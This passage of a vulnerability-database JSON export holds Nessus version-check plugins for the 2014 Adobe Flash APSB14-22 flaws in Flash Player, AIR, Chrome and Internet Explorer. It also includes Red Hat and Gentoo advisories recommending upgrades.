or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_adobe_air_installed.nasl\");\n script_require_keys(\"MacOSX/Adobe_AIR/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nkb_base = \"MacOSX/Adobe_AIR\";\nversion = get_kb_item_or_exit(kb_base+\"/Version\");\npath = get_kb_item_or_exit(kb_base+\"/Path\");\n\n# nb: we're checking for versions less than *or equal to* the cutoff!\ncutoff_version = '15.0.0.249';\nfixed_version_for_report = '15.0.0.293';\n\nif (ver_compare(ver:version, fix:cutoff_version, strict:FALSE) <= 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version_for_report +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Adobe AIR\", version, path);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-26T11:21:56", "bulletinFamily": "scanner", "description": "According to its version, the installation of Adobe Flash Player\ninstalled on the remote Mac OS X host is equal or prior to 15.0.0.167.\nIt is, therefore, affected by the following vulnerabilities :\n\n - Multiple memory corruption issues due to improperly\n sanitized user-supplied input allow arbitrary code\n execution. (CVE-2014-0564, CVE-2014-0558)\n\n - An integer overflow issue due to improperly sanitized\n user-supplied input that allows arbitrary code\n execution. 
(CVE-2014-0569)\n\n - An arbitrary code execution vulnerability due to the\n handling of a dereferenced memory pointer.\n (CVE-2014-8439)", "modified": "2019-11-02T00:00:00", "id": "MACOSX_FLASH_PLAYER_15_0_0_189.NASL", "href": "https://www.tenable.com/plugins/nessus/78443", "published": "2014-10-15T00:00:00", "title": "Flash Player for Mac <= 15.0.0.167 Multiple Vulnerabilities (APSB14-22)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78443);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\n \"CVE-2014-0558\",\n \"CVE-2014-0564\",\n \"CVE-2014-0569\",\n \"CVE-2014-8439\"\n );\n script_bugtraq_id(\n 70437,\n 70441,\n 70442,\n 71289\n );\n\n script_name(english:\"Flash Player for Mac <= 15.0.0.167 Multiple Vulnerabilities (APSB14-22)\");\n script_summary(english:\"Checks the version of Flash Player.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host has a browser plugin that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the installation of Adobe Flash Player\ninstalled on the remote Mac OS X host is equal or prior to 15.0.0.167.\nIt is, therefore, affected by the following vulnerabilities :\n\n - Multiple memory corruption issues due to improperly\n sanitized user-supplied input allow arbitrary code\n execution. (CVE-2014-0564, CVE-2014-0558)\n\n - An integer overflow issue due to improperly sanitized\n user-supplied input that allows arbitrary code\n execution. 
(CVE-2014-0569)\n\n - An arbitrary code execution vulnerability due to the\n handling of a dereferenced memory pointer.\n (CVE-2014-8439)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-22.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 15.0.0.189 or later.\n\nAlternatively, Adobe has made version 13.0.0.250 available for those\ninstallations that cannot be upgraded to 15.x.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-8439\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player casi32 Integer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 
2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_flash_player_installed.nasl\");\n script_require_keys(\"MacOSX/Flash_Player/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"MacOSX/Flash_Player/Version\");\npath = get_kb_item_or_exit(\"MacOSX/Flash_Player/Path\");\n\nif (ver_compare(ver:version, fix:\"14.0.0.0\", strict:FALSE) >= 0)\n{\n cutoff_version = \"15.0.0.167\";\n fix = \"15.0.0.189\";\n}\nelse\n{\n cutoff_version = \"13.0.0.244\";\n fix = \"13.0.0.250\";\n}\n\n# nb: we're checking for versions less than *or equal to* the cutoff!\nif (ver_compare(ver:version, fix:cutoff_version, strict:FALSE) <= 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Flash Player for Mac\", version, path);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-26T11:22:06", "bulletinFamily": "scanner", "description": "The version of Google Chrome installed on the remote Mac OS X host is\na version prior to 38.0.2125.104. It is, therefore, affected by the\nfollowing vulnerabilities due to the version of Adobe Flash bundled\nwith the application :\n\n - Multiple memory corruption issues due to improperly\n sanitized user-supplied input allow arbitrary code\n execution. (CVE-2014-0564, CVE-2014-0558)\n\n - An integer overflow issue due to improperly sanitized\n user-supplied input that allows arbitrary code\n execution. 
(CVE-2014-0569)\n\n - An arbitrary code execution vulnerability due to the\n handling of a dereferenced memory pointer.\n (CVE-2014-8439)", "modified": "2019-11-02T00:00:00", "id": "MACOSX_GOOGLE_CHROME_38_0_2125_104.NASL", "href": "https://www.tenable.com/plugins/nessus/78476", "published": "2014-10-15T00:00:00", "title": "Google Chrome < 38.0.2125.104 Multiple Vulnerabilities (Mac OS X)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78476);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\n \"CVE-2014-0558\",\n \"CVE-2014-0564\",\n \"CVE-2014-0569\",\n \"CVE-2014-8439\"\n );\n script_bugtraq_id(\n 70437,\n 70441,\n 70442,\n 71289\n );\n\n script_name(english:\"Google Chrome < 38.0.2125.104 Multiple Vulnerabilities (Mac OS X)\");\n script_summary(english:\"Checks the version number of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host contains a web browser that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Mac OS X host is\na version prior to 38.0.2125.104. It is, therefore, affected by the\nfollowing vulnerabilities due to the version of Adobe Flash bundled\nwith the application :\n\n - Multiple memory corruption issues due to improperly\n sanitized user-supplied input allow arbitrary code\n execution. (CVE-2014-0564, CVE-2014-0558)\n\n - An integer overflow issue due to improperly sanitized\n user-supplied input that allows arbitrary code\n execution. 
(CVE-2014-0569)\n\n - An arbitrary code execution vulnerability due to the\n handling of a dereferenced memory pointer.\n (CVE-2014-8439)\");\n # http://googlechromereleases.blogspot.dk/2014/10/stable-channel-update_14.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?335e9fff\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 38.0.2125.104 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-8439\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player casi32 Integer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"MacOSX/Google Chrome/Installed\");\n\ngoogle_chrome_check_version(fix:'38.0.2125.104', severity:SECURITY_HOLE, xss:FALSE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-26T11:04:20", "bulletinFamily": "scanner", "description": "The version of Google Chrome installed on the remote host is a version\nprior to 38.0.2125.104. It is, therefore, affected by the following\nvulnerabilities due to the version of Adobe Flash bundled with the\napplication :\n\n - Multiple memory corruption issues due to improperly\n sanitized user-supplied input allow arbitrary code\n execution. (CVE-2014-0564, CVE-2014-0558)\n\n - An integer overflow issue due to improperly sanitized\n user-supplied input that allows arbitrary code\n execution. 
(CVE-2014-0569)\n\n - An arbitrary code execution vulnerability due to the\n handling of a dereferenced memory pointer.\n (CVE-2014-8439)", "modified": "2019-11-02T00:00:00", "id": "GOOGLE_CHROME_38_0_2125_104.NASL", "href": "https://www.tenable.com/plugins/nessus/78475", "published": "2014-10-15T00:00:00", "title": "Google Chrome < 38.0.2125.104 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78475);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\n \"CVE-2014-0558\",\n \"CVE-2014-0564\",\n \"CVE-2014-0569\",\n \"CVE-2014-8439\"\n );\n script_bugtraq_id(\n 70437,\n 70441,\n 70442,\n 71289\n );\n\n script_name(english:\"Google Chrome < 38.0.2125.104 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version number of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains a web browser that is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote host is a version\nprior to 38.0.2125.104. It is, therefore, affected by the following\nvulnerabilities due to the version of Adobe Flash bundled with the\napplication :\n\n - Multiple memory corruption issues due to improperly\n sanitized user-supplied input allow arbitrary code\n execution. (CVE-2014-0564, CVE-2014-0558)\n\n - An integer overflow issue due to improperly sanitized\n user-supplied input that allows arbitrary code\n execution. 
(CVE-2014-0569)\n\n - An arbitrary code execution vulnerability due to the\n handling of a dereferenced memory pointer.\n (CVE-2014-8439)\");\n # http://googlechromereleases.blogspot.dk/2014/10/stable-channel-update_14.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?335e9fff\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 38.0.2125.104 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-8439\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player casi32 Integer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"SMB/Google_Chrome/Installed\");\ninstalls = get_kb_list(\"SMB/Google_Chrome/*\");\n\ngoogle_chrome_check_version(installs:installs, fix:'38.0.2125.104', severity:SECURITY_HOLE, xss:FALSE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-26T12:31:00", "bulletinFamily": "scanner", "description": "The remote host is missing KB3001237. It is, therefore, affected by\nthe following vulnerabilities :\n\n - Multiple memory corruption issues due to improperly\n sanitized user-supplied input allow arbitrary code\n execution. (CVE-2014-0564, CVE-2014-0558)\n\n - An integer overflow issue due to improperly sanitized\n user-supplied input that allows arbitrary code\n execution. (CVE-2014-0569)\n\n - An arbitrary code execution vulnerability due to the\n handling of a dereferenced memory pointer.\n (CVE-2014-8439)", "modified": "2019-11-02T00:00:00", "id": "SMB_KB3001237.NASL", "href": "https://www.tenable.com/plugins/nessus/78444", "published": "2014-10-15T00:00:00", "title": "MS KB3001237: Update for Vulnerabilities in Adobe Flash Player in Internet Explorer", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78444);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\n \"CVE-2014-0558\",\n \"CVE-2014-0564\",\n \"CVE-2014-0569\",\n \"CVE-2014-8439\"\n );\n script_bugtraq_id(\n 70437,\n 70441,\n 70442,\n 71289\n );\n script_xref(name:\"MSKB\", value:\"3001237\");\n\n script_name(english:\"MS KB3001237: Update for Vulnerabilities in Adobe Flash Player in Internet Explorer\");\n script_summary(english:\"Checks version of ActiveX control.\");\n\n script_set_attribute(attribute:\"synopsis\", 
value:\n\"The remote host has an ActiveX control installed that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing KB3001237. It is, therefore, affected by\nthe following vulnerabilities :\n\n - Multiple memory corruption issues due to improperly\n sanitized user-supplied input allow arbitrary code\n execution. (CVE-2014-0564, CVE-2014-0558)\n\n - An integer overflow issue due to improperly sanitized\n user-supplied input that allows arbitrary code\n execution. (CVE-2014-0569)\n\n - An arbitrary code execution vulnerability due to the\n handling of a dereferenced memory pointer.\n (CVE-2014-8439)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-22.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2016/2755801\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/3001237/microsoft-security-advisory-update-for-vulnerabilities-in-adobe-flash\");\n script_set_attribute(attribute:\"solution\", value:\n\"Install Microsoft KB3001237.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-8439\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player casi32 Integer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_activex_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nif (activex_init() != ACX_OK) audit(AUDIT_FN_FAIL, \"activex_init()\");\n\n# Adobe Flash Player CLSID\nclsid = '{D27CDB6E-AE6D-11cf-96B8-444553540000}';\n\nfile = activex_get_filename(clsid:clsid);\nif (isnull(file))\n{\n activex_end();\n audit(AUDIT_FN_FAIL, \"activex_get_filename\", \"NULL\");\n}\nif (!file)\n{\n activex_end();\n audit(AUDIT_ACTIVEX_NOT_FOUND, clsid);\n}\n\n# Get its version.\nversion = activex_get_fileversion(clsid:clsid);\nif (!version)\n{\n activex_end();\n audit(AUDIT_VER_FAIL, file);\n}\n\ninfo = '';\n\niver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\n\n# < 
15.0.0.167\nif (\n (report_paranoia > 1 || activex_get_killbit(clsid:clsid) == 0) &&\n (\n iver[0] < 15 ||\n (\n iver[0] == 15 &&\n (\n (iver[1] == 0 && iver[2] == 0 && iver[3] < 167)\n )\n )\n )\n)\n{\n info = '\\n Path : ' + file +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 15.0.0.167' +\n '\\n';\n}\n\nport = kb_smb_transport();\n\nif (info != '')\n{\n if (report_verbosity > 0)\n {\n if (report_paranoia > 1)\n {\n report = info +\n '\\n' +\n 'Note, though, that Nessus did not check whether the kill bit was\\n' +\n \"set for the control's CLSID because of the Report Paranoia setting\" + '\\n' +\n 'in effect when this scan was run.\\n';\n }\n else\n {\n report = info +\n '\\n' +\n 'Moreover, its kill bit is not set so it is accessible via Internet\\n' +\n 'Explorer.\\n';\n }\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-26T10:51:51", "bulletinFamily": "scanner", "description": "According to its version, the installation of Adobe Flash Player\ninstalled on the remote Windows host is equal or prior to 15.0.0.167.\nIt is, therefore, affected by the following vulnerabilities :\n\n - Multiple memory corruption issues due to improperly\n sanitized user-supplied input allow arbitrary code\n execution. (CVE-2014-0564, CVE-2014-0558)\n\n - An integer overflow issue due to improperly sanitized\n user-supplied input that allows arbitrary code\n execution. 
(CVE-2014-0569)\n\n - An arbitrary code execution vulnerability due to the\n handling of a dereferenced memory pointer.\n (CVE-2014-8439)", "modified": "2019-11-02T00:00:00", "id": "FLASH_PLAYER_APSB14-22.NASL", "href": "https://www.tenable.com/plugins/nessus/78441", "published": "2014-10-15T00:00:00", "title": "Flash Player <= 15.0.0.167 Multiple Vulnerabilities (APSB14-22)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78441);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\n \"CVE-2014-0558\",\n \"CVE-2014-0564\",\n \"CVE-2014-0569\",\n \"CVE-2014-8439\"\n );\n script_bugtraq_id(\n 70437,\n 70441,\n 70442,\n 71289\n );\n\n script_name(english:\"Flash Player <= 15.0.0.167 Multiple Vulnerabilities (APSB14-22)\");\n script_summary(english:\"Checks the version of Flash Player.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the installation of Adobe Flash Player\ninstalled on the remote Windows host is equal or prior to 15.0.0.167.\nIt is, therefore, affected by the following vulnerabilities :\n\n - Multiple memory corruption issues due to improperly\n sanitized user-supplied input allow arbitrary code\n execution. (CVE-2014-0564, CVE-2014-0558)\n\n - An integer overflow issue due to improperly sanitized\n user-supplied input that allows arbitrary code\n execution. 
(CVE-2014-0569)\n\n - An arbitrary code execution vulnerability due to the\n handling of a dereferenced memory pointer.\n (CVE-2014-8439)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-22.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 15.0.0.189 or later.\n\nAlternatively, Adobe has made version 13.0.0.250 available for those\ninstallations that cannot be upgraded to 15.x.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-8439\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player casi32 Integer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by 
Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"flash_player_installed.nasl\");\n script_require_keys(\"SMB/Flash_Player/installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Flash_Player/installed\");\n\n# Identify vulnerable versions.\ninfo = \"\";\n\n# we're checking for versions less than *or equal to* the cutoff!\nforeach variant (make_list(\"Plugin\", \"ActiveX\", \"Chrome\", \"Chrome_Pepper\"))\n{\n vers = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/Version/*\");\n files = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/File/*\");\n if (!isnull(vers) && !isnull(files))\n {\n foreach key (keys(vers))\n {\n ver = vers[key];\n\n if (ver)\n {\n iver = split(ver, sep:'.', keep:FALSE);\n for (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\n\n if (\n (\n # Chrome Flash <= 15.0.0.152\n variant == \"Chrome_Pepper\" &&\n (\n (iver[0] < 15) ||\n (iver[0] == 15 && iver[1] == 0 && iver[2] == 0 && iver[3] <= 152)\n )\n ) ||\n (variant != \"Chrome_Pepper\" &&\n (\n (\n # < 13\n (\n iver[0] < 13 ||\n # 13.0.0.x <= 13.0.0.244\n (\n iver[0] == 13 &&\n (\n iver[1] == 0 &&\n (\n iver[2] == 0 &&\n (\n iver[3] <= 244\n )\n )\n )\n )\n ) ||\n # 14.0.0.x <= 15.0.0.167\n (\n iver[0] == 14 ||\n (\n iver[0] == 15 &&\n (\n iver[1] == 0 &&\n (\n iver[2] == 0 &&\n (\n iver[3] <= 167\n )\n )\n )\n )\n )\n )\n )\n )\n )\n {\n num = key - (\"SMB/Flash_Player/\"+variant+\"/Version/\");\n file = files[\"SMB/Flash_Player/\"+variant+\"/File/\"+num];\n if (variant == \"Plugin\")\n {\n info += '\\n Product : Browser Plugin (for Firefox / Netscape / Opera)';\n fix = \"15.0.0.189 / 13.0.0.250\";\n }\n else if (variant == \"ActiveX\")\n {\n info += '\\n Product : ActiveX control (for Internet Explorer)';\n fix = \"15.0.0.189 / 13.0.0.250\";\n }\n else if (\"Chrome\" >< variant)\n {\n info += '\\n Product : Browser Plugin (for Google Chrome)';\n }\n info += '\\n Path : ' + file +\n '\\n Installed version 
: ' + ver;\n if (variant == \"Chrome_Pepper\")\n info += '\\n Fixed version : 15.0.0.189 (Chrome PepperFlash)';\n else\n info += '\\n Fixed version : '+fix;\n info += '\\n';\n }\n }\n }\n }\n}\n\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0) security_hole(port:port, extra:info);\n else security_hole(port);\n}\nelse\n{\n if (thorough_tests)\n exit(0, 'No vulnerable versions of Adobe Flash Player were found.');\n else\n exit(1, 'Google Chrome\\'s built-in Flash Player may not have been detected because the \\'Perform thorough tests\\' setting was not enabled.');\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:46:29", "bulletinFamily": "unix", "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player. These\nvulnerabilities are detailed in the Adobe Security Bulletin APSB14-22,\nlisted in the References section.\n\nMultiple flaws were found in the way flash-plugin displayed certain SWF\ncontent. An attacker could use these flaws to create a specially crafted\nSWF file that would cause flash-plugin to crash or, potentially, execute\narbitrary code when the victim loaded a page containing the malicious SWF\ncontent. 
(CVE-2014-0558, CVE-2014-0564, CVE-2014-0569)\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 11.2.202.411.\n", "modified": "2018-06-07T09:04:20", "published": "2014-10-15T04:00:00", "id": "RHSA-2014:1648", "href": "https://access.redhat.com/errata/RHSA-2014:1648", "type": "redhat", "title": "(RHSA-2014:1648) Critical: flash-plugin security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:30", "bulletinFamily": "unix", "description": "### Background\n\nThe Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process or bypass security restrictions. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Adobe Flash Player users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-plugins/adobe-flash-11.2.202.418\"", "modified": "2014-11-21T00:00:00", "published": "2014-11-21T00:00:00", "id": "GLSA-201411-06", "href": "https://security.gentoo.org/glsa/201411-06", "type": "gentoo", "title": "Adobe Flash Player: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": 